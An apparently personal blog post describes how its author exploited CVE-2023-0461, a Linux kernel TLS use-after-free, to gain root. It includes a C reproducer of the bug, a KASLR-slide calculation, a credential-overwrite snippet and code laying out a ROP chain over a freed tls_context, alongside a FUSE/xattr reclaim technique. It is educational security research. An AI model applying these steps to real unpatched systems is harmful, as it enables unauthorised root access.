Exploiting a bug in the Linux kernel with Zig

At the tender young age of 36 I decided to write my first exploit. Because I have been writing Linux kernel tests and bug reproducers for years, it looked like a good idea to target the Linux kernel.

The Linux kernel is probably the hardest thing I can expect to exploit in a reasonable time. I know less about browser internals and other things which appear to enjoy the same level of competition.

The payoff here is insight into what it takes, rather than a direct monetary reward.

I chose to exploit a bug that was previously used in Google’s kernelCTF. It’s not a trendy bug with a marketing team. It’s just known by the name CVE-2023-0461. I chose it because it was the first bug in Google’s spreadsheet.

I don’t like the idea of exploiting fake bugs or bugs in older kernels without most of today’s mitigations. However I didn’t want to target a bug that has never been exploited.

I wanted to know for certain that overall exploitation was possible. Otherwise I could get discouraged and give up on a bug when actually I would learn an important lesson from pushing through.

Regardless of what I do next, I think it was well worth the effort to get this working.

This isn’t a rigorous write-up on a new technique or a zero-day. It’s just my thoughts on the exploitation. Nonetheless it contains many technical details, a lot of which will be difficult to follow unless you are already very familiar with the subject matter.

I have created a video on the last part of the exploit covering the ROP chain. I had the intention of covering the other sections too, but when I started trying to step through those bits it got very disjointed and confused. I may come back to those, perhaps after I come up with a better solution for the heap spray. Perhaps not.

I’m really stretching the Zig theme here, but yes the exploit is written in Zig. It’s terrible Zig code, I made no effort to clean it up. However there is now a Linux kernel exploit written in Zig.

I would speculate that Zig is an attractive language for exploit writers, for precisely the same reasons it’s attractive for writing embedded and system code. However there is no evidence of that presented here.

Again it’s not like I am bitter or anything

Note that more usefully there is also an LTP test which reproduces the bug. The Linux Test Project has a number of such tests.

The bug

The bug is in the “Upper Layer Protocol” (ULP for short) layer on top of TCP sockets. In theory all ULPs are vulnerable, but I only looked at TLS.

The Linux TLS module allows applications to offload some processing to the kernel or hardware. Once you have established a TCP connection and done the public key cryptography bit, the ULP allows you to offload the symmetric cryptographic stage to the kernel.

The bug was originally exploited (probably) by “D3v17 - savy@syst3mfailure.io”. They used it against the mitigation bypass target in Google’s kernelCTF. I’m looking at their exploit and write-up for the first time now and it is mostly a mystery to me.

The steps to reproduce the bug are the same, but that is where the similarities end. They didn’t resort to using FUSE and instead found a way to get their hands on those elastic objects I keep hearing about.

We’ll come back to how annoyed I am at using FUSE later. For now let’s look at my description of the bug which I wrote for the LTP test.

Reproducer for CVE-2023-0461 which is an exploitable use-after-free in a TLS socket. In fact it is exploitable in any User Level Protocol (ULP) which does not clone its context when accepting a connection.

Because it does not clone the context, the child socket which is created on accept has a pointer to the listening socket’s context. When the child is closed the parent’s context is freed while it still has a reference to it.

TLS can only be added to a socket which is connected. Not listening or disconnected, and a connected socket can not be set to listening. So we have to connect the socket, add TLS, then disconnect, then set it to listening.

To my knowledge, setting a socket from open to disconnected requires a trick; we have to “connect” to an unspecified address. This could explain why the bug was not found earlier.

The accepted fix was to disallow listening on sockets with a ULP set which does not have a clone function.

It took me a while of scanning the kernel code to find out that the connect system call can be used to disconnect a socket. I reviewed the locations where the socket state is updated and this appears to be the only place that meets the criteria.

This is written in the connect Linux man pages, but I wouldn’t have thought to look there because… you know, the name. I also must have seen this information before, but strangely enough my initial thought was that this bug is impossible because socket state transitions are one way.

For stream sockets at least this would match the BSD man pages. I find the POSIX page painful to read, but it doesn’t appear to address calling connect multiple times on a connection mode socket. It is left open to implementation.

Never think things do what their name suggests

This bug is probably a sin of omission, that is one where the software developer did not take into account some possible program state. If that is the case then I would also say that the semantic overloading of connect did not help.

Reproducing

I’m not sure how the bug was found, but I was starting with a CVE and fix commit with no reproducer. So the first step is to find a way of reliably reproducing the bug.

Below is the fix commit.

commit 2c02d41d71f90a5168391b6a5f2954112ba2307c
Author: Paolo Abeni <pabeni@redhat.com>
Date:   Tue Jan 3 12:19:17 2023 +0100

    net/ulp: prevent ULP without clone op from entering the LISTEN status

    When an ULP-enabled socket enters the LISTEN status, the listener ULP data
    pointer is copied inside the child/accepted sockets by sk_clone_lock().

    The relevant ULP can take care of de-duplicating the context pointer via
    the clone() operation, but only MPTCP and SMC implement such op.

    Other ULPs may end-up with a double-free at socket disposal time.

    We can't simply clear the ULP data at clone time, as TLS replaces the
    socket ops with custom ones assuming a valid TLS ULP context is
    available.

    Instead completely prevent clone-less ULP sockets from entering the
    LISTEN status.

    Fixes: 734942cc4ea6 ("tcp: ULP infrastructure")
    Reported-by: slipper <slipper.alive@gmail.com>
    Signed-off-by: Paolo Abeni <pabeni@redhat.com>
    Link: https://lore.kernel.org/r/4b80c3d1dbe3d0ab072f80450c202d9bc88b4b03.1672740602.git.pabeni@redhat.com
    Signed-off-by: Jakub Kicinski <kuba@kernel.org>

diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
index 848ffc3e0239..d1f837579398 100644
--- a/net/ipv4/inet_connection_sock.c
+++ b/net/ipv4/inet_connection_sock.c
@@ -1200,12 +1200,26 @@ void inet_csk_prepare_forced_close(struct sock *sk)
 }
 EXPORT_SYMBOL(inet_csk_prepare_forced_close);

+static int inet_ulp_can_listen(const struct sock *sk)
+{
+       const struct inet_connection_sock *icsk = inet_csk(sk);
+
+       if (icsk->icsk_ulp_ops && !icsk->icsk_ulp_ops->clone)
+               return -EINVAL;
+
+       return 0;
+}
+
 int inet_csk_listen_start(struct sock *sk)
 {
        struct inet_connection_sock *icsk = inet_csk(sk);
        struct inet_sock *inet = inet_sk(sk);
        int err;

+       err = inet_ulp_can_listen(sk);
+       if (unlikely(err))
+               return err;
+

Next is the CVE description, which was perhaps updated at some point. I will go with what’s in my notes.

There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.

There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener.

If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.

So no hint at how one disconnects a TCP socket and actually we need more than that. We want to set the lower level socket state to SS_UNCONNECTED. Otherwise we can’t call listen. This is different from the TCP level connection.

Disconnecting a TCP socket can be done in at least two other ways: you can close the other end or call shutdown. However that won’t set the socket state to SS_UNCONNECTED unless the connection was never fully established. That will just set the TCP state to TCP_CLOSE.

If the connection is never fully established then we can not set the ULP to TLS. So we need to fully establish the connection then reset both the socket and TCP states. Which, as I already mentioned, is done using connect with an address of AF_UNSPEC.

Once we know how to do it, it is relatively straightforward to reproduce. First we create a connection and call setsockopt on the connected socket to add TLS to it. Then we call connect with AF_UNSPEC to set SS_UNCONNECTED and TCP_CLOSE on the socket. Finally we call listen and accept to accept an incoming connection, then close that connection.

When that final connection is closed it will free tls_context while the listening socket still has a reference to it.

There are no race conditions and we could easily trigger the free multiple times once we have a listening socket with a tls_context. No instability comes from this part of the process.
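The sequence of calls described above can be sketched in C roughly as follows. This is a minimal illustration, not the LTP test or the exploit itself: the names ulp_listen_sequence and bind_loopback, the use of loopback with ephemeral ports, and the step numbers in the return value are all assumptions made for the example. With with_tls set to 0 it only shows that connect with AF_UNSPEC lets a once-connected socket listen. With with_tls set to 1 on a kernel carrying the fix commit, listen is expected to fail with EINVAL at step 5.

```c
#include <assert.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef TCP_ULP
#define TCP_ULP 31 /* value from the kernel's uapi/linux/tcp.h */
#endif

/* Bind sk to an ephemeral loopback port and report the chosen address. */
static int bind_loopback(int sk, struct sockaddr_in *addr)
{
	socklen_t len = sizeof(*addr);

	assert(addr != NULL);
	memset(addr, 0, sizeof(*addr));
	addr->sin_family = AF_INET;
	addr->sin_addr.s_addr = htonl(INADDR_LOOPBACK);
	if (bind(sk, (struct sockaddr *)addr, sizeof(*addr)))
		return -1;
	return getsockname(sk, (struct sockaddr *)addr, &len);
}

/* Returns 0 if every step worked, else the negated number of the failed step. */
int ulp_listen_sequence(int with_tls)
{
	const struct sockaddr unspec = { .sa_family = AF_UNSPEC };
	struct sockaddr_in addr;
	int lsk = socket(AF_INET, SOCK_STREAM, 0);  /* temporary listener */
	int csk = socket(AF_INET, SOCK_STREAM, 0);  /* socket that gets the ULP */
	int peer = socket(AF_INET, SOCK_STREAM, 0); /* connects to csk later */
	int acc = -1, child = -1, ret = 0;

	if (lsk < 0 || csk < 0 || peer < 0)
		ret = -1;
	/* Step 2: fully establish a connection so a ULP can be attached. */
	else if (bind_loopback(lsk, &addr) || listen(lsk, 1) ||
		 connect(csk, (struct sockaddr *)&addr, sizeof(addr)) ||
		 (acc = accept(lsk, NULL, NULL)) < 0)
		ret = -2;
	/* Step 3: attach TLS, which allocates the tls_context. */
	else if (with_tls &&
		 setsockopt(csk, IPPROTO_TCP, TCP_ULP, "tls", 3))
		ret = -3;
	/* Step 4: "connect" to AF_UNSPEC to reach SS_UNCONNECTED and TCP_CLOSE. */
	else if (connect(csk, &unspec, sizeof(unspec)))
		ret = -4;
	/* Step 5: the formerly connected socket becomes a listener. */
	else if (bind_loopback(csk, &addr) || listen(csk, 1))
		ret = -5;
	/* Step 6: accept a child that shares the listener's ULP context. */
	else if (connect(peer, (struct sockaddr *)&addr, sizeof(addr)) ||
		 (child = accept(csk, NULL, NULL)) < 0)
		ret = -6;

	/* Closing the child is the point where a vulnerable kernel frees
	 * the context that csk still points to. */
	if (child >= 0)
		close(child);
	if (acc >= 0)
		close(acc);
	if (peer >= 0)
		close(peer);
	if (csk >= 0)
		close(csk);
	if (lsk >= 0)
		close(lsk);
	return ret;
}
```

Calling ulp_listen_sequence(0) is harmless on any kernel. Calling it with 1 should only be done in a disposable VM, since on an unpatched kernel it leaves a dangling pointer behind.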

Heap spray

At this point I knew that a use-after-free is useful for causing a type confusion. That is, the freed memory we still have a pointer to can be reallocated as a different type of object.

More than one type of object then shares the same memory, so we can corrupt the memory from the POV of one or both of the objects.

The active Linux heap allocator (SLUB) uses various object caches. Some important objects get their own cache. Most however are allocated from general purpose caches of different sizes.

The tls_context object is allocated in the kmalloc-512 cache. There are multiple ways to find this out, including looking at the size of the struct (328) and the flags it is allocated with (GFP_KERNEL).

Also by adding slub_debug=T,*-512 to the kernel command line then doing the allocation we will see which 512 cache it is in. If we don’t know the size of the struct then debugging with gdb or tracing with kernel probes can show which cache is used.

Based on various writeups I had read (sorry I lost track of where I first saw some things), there are a number of objects, such as msg_msg and sk_buff, that can be allocated in any cache size and are mostly full of attacker controlled data.

So I started trying to heap spray these objects, however I didn’t appear to be getting any hits. Using some of the tracing methods mentioned above I realised that these objects were being allocated in kmalloc-cg-512, not kmalloc-512.

Looking at their allocations, they use GFP_KERNEL_ACCOUNT not GFP_KERNEL. On the face of it this flag has something to do with memory counters used in control groups. However it now also causes objects to be allocated in a different cache.

This is good for security because a lot of juicy variable length objects containing arbitrary user data are now segregated from everything else.
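To make the cache selection concrete, here is a small model of it in C. It is only a sketch: the size class table reflects the usual x86-64 layout up to 512 bytes, the function names are made up for the example, and the accounted flag stands in for GFP_KERNEL_ACCOUNT on a kernel that has the separate kmalloc-cg caches.

```c
#include <assert.h>
#include <stddef.h>

/* Round a request up to its general purpose size class. Classes above
 * 512 bytes are left out of this sketch, so 0 means "not modelled". */
size_t kmalloc_size_class(size_t size)
{
	static const size_t classes[] = { 8, 16, 32, 64, 96, 128, 192, 256, 512 };
	size_t i;

	assert(size > 0);
	for (i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
		if (size <= classes[i])
			return classes[i];
	return 0;
}

/* Two allocations can only reuse each other's slots if they fall in the
 * same size class and agree on accounting (kmalloc-N vs kmalloc-cg-N). */
int can_share_cache(size_t size_a, int accounted_a,
		    size_t size_b, int accounted_b)
{
	size_t class_a = kmalloc_size_class(size_a);
	size_t class_b = kmalloc_size_class(size_b);

	return class_a != 0 && class_a == class_b &&
	       !accounted_a == !accounted_b;
}
```

With these definitions a 328 byte tls_context lands in the 512 class, and an accounted object of the same size does not share a cache with it, which matches the missing heap spray hits described above.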

At this point I knew I could arbitrarily free any object in the kmalloc-512 cache. I wasn’t sure what to do with that though. I also knew that cross cache attacks are possible, however I assumed it would be easier to find an object in the same cache. So I started looking for more objects I could use to replace msg_msg.

I became fixated with splice and writev. Firstly because I read about some ancient attack that hasn’t worked since the introduction of copy_to/from_user. I should have known better, but at least at this point I could see that my heap spray worked.

Secondly I moved on to bio_vec, which is used when splicing between pipes, because it can allocate an object in kmalloc-512 and then block. The problem is that the object is a bio_vec array which contains pointers to struct page. These pages are mapped in just before use.

I didn’t have anything to pass as a pointer to a struct page at this point. I suppose that if I knew any valid page addresses (or pfn) then this could be used to read or write to it.

Finding a suitable object was far from the only problem. To my knowledge the free is delayed by up to 5000 jiffies, which appears to be 5 seconds on the target kernel config.

This is because the context is freed with kfree_rcu which batches up frees. The maximum batch age is 5000 jiffies and on my quiet system I would often hit that. I suppose the time could be reduced by spamming frees, but then that could interfere with other things.

Throughout the exploit development I would accidentally introduce a change that put the wrong object into the freed slot. In one case I also moved the free and allocation to different processes and therefore different CPUs. Each CPU has its own free list, so this also stopped it from working. It was the main source of instability and confusion.
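One common way to keep the free and the allocation on the same CPU is to pin the thread before doing either. The following is a sketch of that idea and not necessarily what the exploit does; pin_to_current_cpu is a name invented for the example, and it simply pins to whichever CPU the thread happens to be running on.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>

/* Pin the calling thread to the CPU it is currently running on.
 * Returns that CPU's number, or -1 on failure. */
int pin_to_current_cpu(void)
{
	cpu_set_t set;
	int cpu = sched_getcpu();

	if (cpu < 0)
		return -1;
	assert(cpu < CPU_SETSIZE);

	CPU_ZERO(&set);
	CPU_SET(cpu, &set);
	/* pid 0 means the calling thread */
	if (sched_setaffinity(0, sizeof(set), &set))
		return -1;
	return cpu;
}
```

Any process that takes part in the free or the reallocation would need to pin itself to the same CPU number for the per-CPU free list to be shared.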

I have a couple of pages of notes and ideas from this stage. Plus there will be more stuff that I looked into, but didn’t bother to write down. This is the part of the exploit I would most like to revisit.

FUSE

What I did know at this point was that there was a well proven heap spray technique using FUSE and extended file attributes. Originally it was done with userfaultfd.

Please do not nitpick, it is the sentiment that counts

I don’t like this technique because I think it can be easily mitigated like userfaultfd. It relies on the attacker having access to /dev/fuse and either fusermount or unprivileged user namespaces.

On a desktop it is quite likely that all users have access to /dev/fuse, but the only processes that need access to this are file system daemons. So there are obvious ways to shut down this attack vector.

Having said that, it may not be convenient for desktops to restrict access to /dev/fuse. FUSE is extremely useful, so I don’t see it going away altogether, unlike userfaultfd, the absence of which has probably not bothered many people outside of data centers.

I have written two articles about FUSE already.

The second article is about using the raw FUSE interface which was partially motivated by this exploit.

I found that using the raw FUSE interface I don’t need to use the mmap page fault technique described in Chompie’s blog. Instead of mapping a file and blocking while reading from the file, I block on processing the xattr request itself.

I don’t know that I need to use the raw interface for this or that it is the better way to do it. However I wanted to poke at the raw interface and I poked it.

Needless to say it added a fair chunk of time onto the exploitation. Still, using FUSE at least, was the right thing to do because the probability it wouldn’t work was very low.

Using this method I don’t really do heap spray. I just allocate a single xattr after a delay. It usually gets the freed slot so long as the free and the alloc happen on the same CPU. This works on my very quiet VM, but I guess it would not fare so well with more noise.

One last note on FUSE is that there are a lot of FUSE message types and I would be surprised if the xattr messages are the only two of interest to attackers. FUSE gives user land the ability to pause inside a whole bunch of internal kernel operations.

KASLR

Now that I could overlap xattr buffers with tls_context I could read the content of tls_context. A caveat is that xattr zeros its buffer, also zeroing tls_context. This corrupts tls_context because after being initialised it contains a couple of pointers.

Luckily these pointers are not used much. Without touching them we are able to set the encryption keys used for transmitting or receiving using setsockopt. This writes lots of interesting things into tls_context.

One of these things is a function pointer to tls_sw_push_pending_record (or tls_device_push_pending_record if hardware with TLS offload is present). We can write this pointer into the xattr buffer while blocking the FUSE request. When setsockopt returns we can then allow the FUSE request to continue and read back the internal kernel pointer.

We need a function pointer because of address space layout randomisation. If KASLR is enabled then the kernel shifts its address space by some amount, so that every symbol is offset from its default location.

If you can read then you can defeat KASLR

However the symbols are all still in the same order and there are no random gaps introduced between them. So if we retrieve a pointer to a known symbol, then we can calculate the location of any symbol.
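The arithmetic is short enough to show in full. In this sketch the unslid addresses are placeholders, not values from the target kernel; real ones would come from the System.map or vmlinux of the exact build being attacked. The alignment check assumes the default 2 MiB kernel alignment on x86-64.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical unslid addresses, for illustration only. */
#define STATIC_PUSH_PENDING_RECORD 0xffffffff81c0a4b0ULL
#define STATIC_COMMIT_CREDS        0xffffffff810b9d00ULL

/* The slide is the difference between where the leaked symbol actually
 * is and where the symbol table says it would be without KASLR. */
uint64_t kaslr_slide(uint64_t leaked_push_pending_record)
{
	uint64_t slide = leaked_push_pending_record - STATIC_PUSH_PENDING_RECORD;

	/* Assumption: the image is moved in 2 MiB steps. A misaligned
	 * result suggests the leak is not the symbol we think it is. */
	assert((slide & 0x1fffffULL) == 0);
	return slide;
}

/* Every other symbol moves by the same amount. */
uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
	return static_addr + slide;
}
```

Given the pointer read back through the xattr buffer, rebase(STATIC_COMMIT_CREDS, kaslr_slide(leak)) would then give the runtime address of commit_creds, and likewise for any gadget address.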

RIP

The more sensitive reader may want to turn away now as things are going to get really ROPey.

At last I could read and write to tls_context. This doesn’t instantly grant root privileges though. The structure doesn’t contain a pointer to the process credentials. Plus it’s not obvious to me how to write to some arbitrary memory just using tls_context without hijacking kernel control flow.

Interestingly tls_context can contain an indirect reference to the creds via ctx->priv_ctx_rx->strp.sk->sk_socket->file->f_cred if we setup encryption for receiving data. I say interesting because any time we have a socket or sk pointer we know an arbitrary read would allow us to find the task creds.

I like the idea of a data only attack, however I didn’t see a clear path to getting arbitrary R/W. I expect it’s totally possible, especially by adding more object types to the type confusion.

With a data only attack I wouldn’t have to use a code reuse attack like ROP or JOP. This seemed attractive for a number of reasons, not least that ROP appeared magical, but also because the chain is specific to a particular kernel binary.

The fact is though that tls_context provides access to at least three function pointers which I can overwrite and execute. So that is three different places where I can try to launch my attack. I gather this is really good.

That isn’t to say it is easy though, as each location requires different setup to execute. We have to execute the function pointer without crashing the kernel before or afterwards.

Note that, back in the bad old days, I would have just been able to write some shell code (I don’t know why the word shell is there, it’s just code) into tls_context, then point one of the function pointers at it. This would then get executed like any other kernel code.

These days the heap memory where tls_context lives is not executable. So if we try that the CPU will refuse to execute it. We can set memory to be executable, but we need code execution to do it, so there is a chicken and egg issue there.

Hence if we want to take control of execution we have to reuse existing code. The code we want though is something like the following.

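// resets credentials to root in the root user namespace
void escalate_privs(void) {
    // prepare_kernel_cred(NULL) builds a fresh set of root credentials,
    // commit_creds() then installs them on the current task
    commit_creds(prepare_kernel_cred(NULL));
}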

If you are writing a kernel, then don’t include a handy function like this. Indeed Linux does not include such code. This does not stop us though because of the way the jmp, call and ret CPU instructions work (for now).

The call instruction takes an address, any executable address, and updates rip to it after pushing the current value of rip to the stack. Meanwhile the ret instruction pops the top value off the stack into rip.

Updating rip changes the next instruction the CPU will execute. Presently there is nothing to stop us from passing an address to call which is not the start of a function.

Likewise ret will jump to whatever value is at the top of the stack. Furthermore we can change the location of the stack, including to heap memory that we control.

So each function has at least one ret instruction and we can jump to the instructions just before each ret to do whatever. The useful sequence of one or more instructions in front of each ret is called a gadget.

We can put the addresses of gadgets on the stack and the ret instructions at the end of each gadget will link them together. This forms a ROP chain, where ROP stands for Return Oriented Programming.
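A toy model may help to see how ret links gadgets together. The code below is not x86 and not an exploit. It is a tiny interpreter in which "addresses" are indices into a table of C functions, every gadget implicitly ends in ret, and ret means "pop the next address off the stack and go there". All names and the fake prepare and commit gadgets are invented for the illustration.

```c
#include <assert.h>
#include <stdint.h>

struct cpu {
	const uint64_t *rsp; /* stack pointer, walks along the chain */
	uint64_t rax, rdi;
	uint64_t committed;  /* stand-in for the side effect we are after */
};

/* Each gadget does a little work; the interpreter performs its "ret". */
static void pop_rdi(struct cpu *c)     { c->rdi = *c->rsp++; }
static void prepare(struct cpu *c)     { c->rax = c->rdi + 0x1000; }
static void mov_rdi_rax(struct cpu *c) { c->rdi = c->rax; }
static void commit(struct cpu *c)      { c->committed = c->rdi; }

enum { G_HALT, G_POP_RDI, G_PREPARE, G_MOV_RDI_RAX, G_COMMIT, G_COUNT };

/* The "kernel text": a fixed set of code we can jump to but not change. */
static void (*const text[G_COUNT])(struct cpu *) = {
	[G_POP_RDI]     = pop_rdi,
	[G_PREPARE]     = prepare,
	[G_MOV_RDI_RAX] = mov_rdi_rax,
	[G_COMMIT]      = commit,
};

uint64_t run_chain(const uint64_t *stack)
{
	struct cpu c = { .rsp = stack };

	for (;;) {
		uint64_t rip = *c.rsp++; /* ret: pop the next address into rip */

		if (rip == G_HALT)
			break;
		assert(rip < G_COUNT);
		text[rip](&c);
	}
	return c.committed;
}
```

A chain of { G_POP_RDI, 0, G_PREPARE, G_MOV_RDI_RAX, G_COMMIT, G_HALT } passes 0 to the fake prepare step and feeds its result to the fake commit step. Note that the 0 after G_POP_RDI is data consumed by the gadget, not an address, which is how arguments get mixed into a real chain as well.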

That’s not all though, because the various jmp instructions can also be used to set rip. There seem to be a variety of ways in which to construct a JOP gadget. In the end I just used ROP.

Note that finding ROP and JOP gadgets in general is easy because of the tooling available. Constructing them into a chain is more challenging, although I’m sure a constraint solver or similar could partially automate that as well.

I extracted the gadgets using the method described here. Then constructed the chain by grepping for suitable gadgets. Notably ChatGPT was useful for describing the purpose of basic x86 instructions and registers. It seems to have synthesized the various sources of x86 documentation well.

Initially I was not sure I could use a ROP chain. I knew I had to change the stack location rsp, but I wasn’t sure it would be allowed. This wasn’t an issue though; apparently no distinction is drawn between stack and heap locations.

Secondly I don’t have the address of tls_context, I have addresses to other memory locations within it, but not the structure itself. There is a pointer to a small amount of memory I control which is used to store some encryption gubbins, however it is too small for a ROP chain.

I noted though that if a register contains tls_context already then I can move that value into rsp using the first gadget. The first items in tls_context aren’t used for a lot of operations, so I can overwrite them with return addresses.

In the middle of tls_context there are some function pointers which we want to use to start the ROP chain. So we have to stack pivot over those. After that there is plenty of space to store a ROP chain.
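The layout just described can be sketched as a function that fills in a fake tls_context sized buffer. Only the 328 byte size comes from the text above. The slot indices, the gadget addresses and the name layout_chain are hypothetical, and the skip gadget is assumed to be something of the form "add rsp, N; ret" that hops over the words still needed as function pointers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CTX_SIZE     328             /* size of struct tls_context */
#define CTX_WORDS    (CTX_SIZE / 8)

/* Hypothetical values, for illustration only. */
#define FN_PTR_FIRST 10              /* first word holding a function pointer */
#define FN_PTR_COUNT 3               /* number of words to hop over */
#define GADGET_PIVOT 0xffffffff81222222ULL /* mov rsp, rax; ret */
#define GADGET_SKIP  0xffffffff81111111ULL /* add rsp, 0x60; ret */

/* Fill ctx so that, once rsp points at ctx[0], execution hops over the
 * function pointer slots and carries on with tail. Returns 0 on success. */
int layout_chain(uint64_t *ctx, const uint64_t *tail, size_t tail_len)
{
	size_t tail_start = FN_PTR_FIRST + FN_PTR_COUNT;

	assert(ctx != NULL && tail != NULL);
	if (tail_start + tail_len > CTX_WORDS)
		return -1; /* the chain does not fit in the object */

	memset(ctx, 0, CTX_SIZE);
	/* After ret pops ctx[0], rsp is at ctx[1]. Adding 0x60 (12 words)
	 * moves it to ctx[13], the first word after the function pointers. */
	ctx[0] = GADGET_SKIP;
	/* The hijacked callback is what moves rsp onto ctx in the first place. */
	ctx[FN_PTR_FIRST] = GADGET_PIVOT;
	memcpy(&ctx[tail_start], tail, tail_len * sizeof(*tail));
	return 0;
}
```

The length check matters in practice: 41 words minus the head and the function pointer slots leaves limited room, so the chain has to be kept short.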

The first place I tried to take rip control turned out to be a bad spot. Firstly it wanted to use the tls_context.sk_proto pointer which had been wiped when allocating xattr.

It only wanted one field in sk_proto, which turned out to be a function pointer. This wasn’t the function pointer I was originally targeting, but it was needed to reach the original, so I targeted it instead.

I couldn’t fake the whole sk_proto object because it is too large to fit in the memory I control. However only one field is accessed at a given offset. So I could fake that one field and put a pointer in ctx->sk_proto which is offset by the distance to the field.
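The offset trick is easy to get wrong by one field, so here it is in isolation. The struct below is a made-up stand-in for a large operations structure, not the real struct proto, and fake_ops_base is a name invented for this sketch. The value is computed as an integer because the resulting "object" mostly does not exist; only the one field may ever be touched through it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for a large ops structure. */
struct big_ops {
	char before[0x98];
	void (*hook)(void);   /* the only field the target code reads */
	char after[0x100];
};

/* Given the address of a slot we control, return the value to store in
 * the ops pointer so that the kernel's read of ->hook lands on that slot. */
uintptr_t fake_ops_base(const void *controlled_slot)
{
	uintptr_t addr = (uintptr_t)controlled_slot;

	assert(addr >= offsetof(struct big_ops, hook));
	return addr - offsetof(struct big_ops, hook);
}
```

If the target code ever reads a second field through the same pointer it will read whatever happens to sit at that offset from the fake base, so this only works when exactly one field is accessed on the path being used.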

This worked, but then I discovered that I had made a mistake. I thought that a pointer to tls_context would be in one of the registers at the call site which would start the ROP chain. It turns out that I was looking at a point in the execution just before the call site.

The register containing the context was cleared just before the call. So now I didn’t know where the location of my chain was. Instead of giving up on this path immediately I decided to try dereferencing the sk pointer which was in a register and the sk structure also contained a pointer to the context.

I would have to do this with JOP and didn’t grasp how to do that. I think it should be possible using a suitable JOP gadget that jumps to a location specified by a register I control. However I gave up and moved to another location to take RIP control.

This time I tried ctx->push_pending_record which can be called by setting ctx->pending_open_record_frags to true and sending a control message with sendmsg. This isn’t the only way to call it, but it appears to be the easiest.

I also got lucky because it has the context in the rax register and there is a ROP gadget which simply copies rax into rsp, thus setting the stack to the context.

Not only that, but I discovered that cmsg allocates a variable sized object with GFP_KERNEL with only a small bit of header data. Potentially that is a replacement for xattr! Although I don’t know how a cmsg payload could be read back to user space.

Anyway I ignored that and managed to write a ROP chain that calls the necessary functions to set the creds. It’s only a very small amount of code, but it was not easy.

The biggest issue was restoring the stack pointer to its original value after elevating privileges. I can’t leave the stack pointing to the context if I want to gracefully return from push_pending_record and back to user land.

I couldn’t think of a way to save the rsp register, so that it could be restored later. I guess it’s possible with JOP, but I had already given up on that. It so happened though that 4 of the registers contained pointers to locations on the original stack.

It took a while, but I found a simple sequence of gadgets that calculated the original rsp value from rbx and restored it. After that I just had to do something with the newly gained privileges and that was it, the exploit was complete.

Writing a ROP chain is rather odd compared to writing plain assembly. The instructions which immediately appear before a ret are constrained by the x86 calling convention. It’s impossible to find mov with some pairs of registers for example. Even if you look at gadgets with multiple instructions, the compiler just doesn’t produce some things.

On the other hand it is surprising what it does produce. Although I guess ROPgadget looks at misaligned instructions as described in the book Practical Binary Analysis. So it’s not necessarily the case that the gadgets it finds are part of the kernel.

Shell

When the exploit successfully returns to user land, it just starts a shell. When the shell closes the kernel crashes because the tls_context is still corrupted and closing the socket causes some zeroed fields to be accessed. This can be fixed of course, it just requires more cleanup.

Because of the way I use FUSE the exploit requires unprivileged user namespaces to mount the FUSE FS. This is only because there is no fusermount in my image and my raw FUSE implementation doesn’t implement something needed to use fusermount anyway. Again this could be fixed, but I’d be more interested in switching away from FUSE.